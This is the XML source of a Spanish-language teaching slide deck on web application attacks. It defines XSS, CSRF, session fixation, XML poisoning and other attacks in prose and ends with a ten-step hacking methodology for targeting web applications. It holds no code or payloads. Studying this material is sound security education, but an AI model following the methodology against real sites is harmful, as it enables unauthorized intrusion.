        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243222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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Explotan vulnerabilidades en las páginas web dinámicamente generadas, lo cual permite a los atacantes maliciosos inyectar un script del lado del cliente dentro de las páginas web vistas por otros usuarios. Esto ocurre cuando datos invalidados ingresados son incluidos en el contenido dinámico que es enviado al navegador del usuario para prestación. Los atacantes inyectan maliciosos JavaScript, VBScript, ActiveX, HTML o flash para la ejecución en el sistema de la víctima escondiendo sus solicitudes legítimas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataques Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="829188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Cross-Site Request Rorgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Explotan vulnerabilidades de páginas web que permiten al atacante forzar un navegador de un usuario no sospechoso para enviar solicitudes maliciosas que sin su intención.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. La víctima tiene una sesión activa con un sitio seguro y simultáneamente visita un sitio malicioso, que inyecta una solicitud HTTP a un sitio de confianza dentro de la sesión de la víctima, comprometiendo su integridad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163732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DoS a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes agotan los recursos del servidor enviando cientos de paquetes de solicitud de recursos intensa, como sacando imágenes grandes o solicitando páginas dinámicas que requieren una búsqueda costosas en los servidores de base de datos. Blancos: CPU, memoria, sockets, ancho de banda del disco, de la base de datos, procesos, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3415405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DoS a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplos: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataques de inicio de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataques de bloqueo de cuentas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Enumeración de usuarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS de registro de usuario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364238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Componentes de una aplicación Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>El Servidor Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Inicio de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Permisos de usuario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Nivel de rol de Seguridad del sistema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Aplicación lógica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Contenido de la aplicación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Acceso a datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Cierre de sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Almacenamiento de datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2900" dirty="0"/>
              <a:t>Mecanismo de rastreo de sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394914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Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ocurren cuando una aplicación escribe más datos a un bloque de la memoria, o buffer, que éste pueda soportar. Permite a un atacante modificar el espacio de dirección del proceso del objetivo para controlar la ejecución del proceso, bloquear la memoria y modificar variables internas. Los atacantes modifican punteros de función por la aplicación para dirigir la ejecución del programa a través de saltos o instrucciones de llamada y la apunta a una ubicación en la memoria que contenga código malicioso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388742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Cookie/Session Poisoning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las cookies son utilizadas para mantener el estado de una sesión en el protocolo HTTP. Este ataque implica la modificación del contenido de una cookie (información personal almacenada en el equipo Web del usuario) para saltar los mecanismos de seguridad. Se inyecta contenido malicioso modificando la experiencia en línea del usuario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3244654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El acatante engaña al usuario para que acceda a un servidor Web genuino utilizando un valor ID de sesión explícito. El atacante asume la identidad de la víctima y explota sus credenciales en el servidor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataque de fijación de sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2639673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Protección en la capa de transporte insuficiente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Soporte a algoritmos débiles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Datos expuestos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Lanzar ataques: La configuración de SSL de bajos privilegios pueden ayudar al atacante a realizar lanzar ataques phishing y MITM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40588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Manipulación de errores inapropiados</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Da una visión dentro del código fuente como fallas lógicas, cuentas por defecto, etc. Utilizando la información recibida de un mensaje de error, un atacante puede identificar vulnerabilidades. Información de BD, ambiente de la aplicación, llamadas del sistema fallidas, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2119171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Almacenamiento criptográfico inseguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Se refiere cuando una aplicación utiliza código de encriptación pobre en los datos de una BD. Esta falla permite a los atacantes robar o modificar información débilmente protegida como tarjetas de crédito, SSNs, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258186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Autenticación roto y administración de sesión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Un atacante utiliza vulnerabilidades en la autenticación o funciones de administración de sesión como cuentas expuestas, IDs de sesión, cierre de sesión, administración de contraseñas, etc. para hacerse pasar por usuarios. IDs de sesión en URL, explotación de tiempo de espera, explotación de contraseña.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3793175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Redirecciones y renvíos inválidos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Habilitan a los atacantes instalar malware o engañar a las víctimas en revelar contraseñas u otra información sensible, donde renvíos no seguros pueden permitir saltos en el control de acceso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1291357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a los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>La evolución de los servicios web ofrece nuevos vectores de ataque en el marco de trabajo de la aplicación. Estos servicios están basados en protocolos XML como Web Services Definition Language (WSDL) para describir puntos de conexión; Universal Description, Discovery and Integration (UDDI) para la descripción y descubrimiento de servicios Web; Simple Object Access Protocol (SOAP) para la comunicación entre los servicios Web que son vulnerables dentro de muchas amenazas de aplicación web.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1225465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Pila de los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Capa Presentación (XML, Ajax, Portal). WSDL probing, Inyección SQL/LDAP/XPATH/OS malware, fuerza bruta, fuga de información, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Capa Seguridad (WS-Security). WSDL probing, Inyección SQL/LDAP/XPATH/OS malware, fuerza bruta, fuga de información, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295677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Aplicaciones Web 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Suponen una revolución en la Web. Blogs, , nuevas tecnologías como Ajax (gmail, youtube), aplicaciones móviles, frameworks, cloud computing websites, online office software, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2876219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Pila de los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Capa Descubrimiento (UDDI, WSDL).Ataques de permisos y accesos, ataques de autenticación y certificados, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Capa Acceso (SOAP, REST).Buffer overflow, XML parsing, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Capa Transporte (HTTP, HTTPS, JMS). Sniffing, snooping, WS-Routing, DoS, etc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3993394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footprinting a los Servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes hacen footprinting a la aplicación web para obtener información de UDDI como businessEntity, bsunesService y tModel.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939061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XML Poisoning a los servicios Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Los atacantes insertan códigos XML maliciosos en las solicitudes SOAP para realizar manipulación de nodos XML o XML schema poisoning para generar errores en la lógica del análisis XML y romper la ejecución lógica.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. Los atacantes pueden manipular referencias a entidades XML externas que pueden conducir a un archivo arbitrario o aperturas en la conexión TCP pueden ser explotados por otros ataques de servicio Web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. XML posoning permite a los atacantes causar un ataque DoS y comprometer información confidencial.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2694276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Metodología Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>1. Footprinting Web Infraestructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>2. Attack Web Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>3. Analyze Web Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>4. Attack Authentication Mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>5. Attack Authorization Schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>6. Attack Session Management Mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>7. Perform Injection Attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>8. Attack Data Connectivity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>9. Attack Web App Client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>10. Attack Web Services.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4108978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1. Footprinting Web Infraestructure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Es el primer paso en el hackeo de la aplicación Web; ayuda a los atacantes a seleccionar víctimas e identificar aplicaciones Web vulnerables. Server Discovery, Service Discovery, Server Identification, Hidden Content Discovery.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1825670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4000" dirty="0"/>
              <a:t>Footprinting Web Infraestructure: Server Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-BO" sz="4000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="es-BO" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
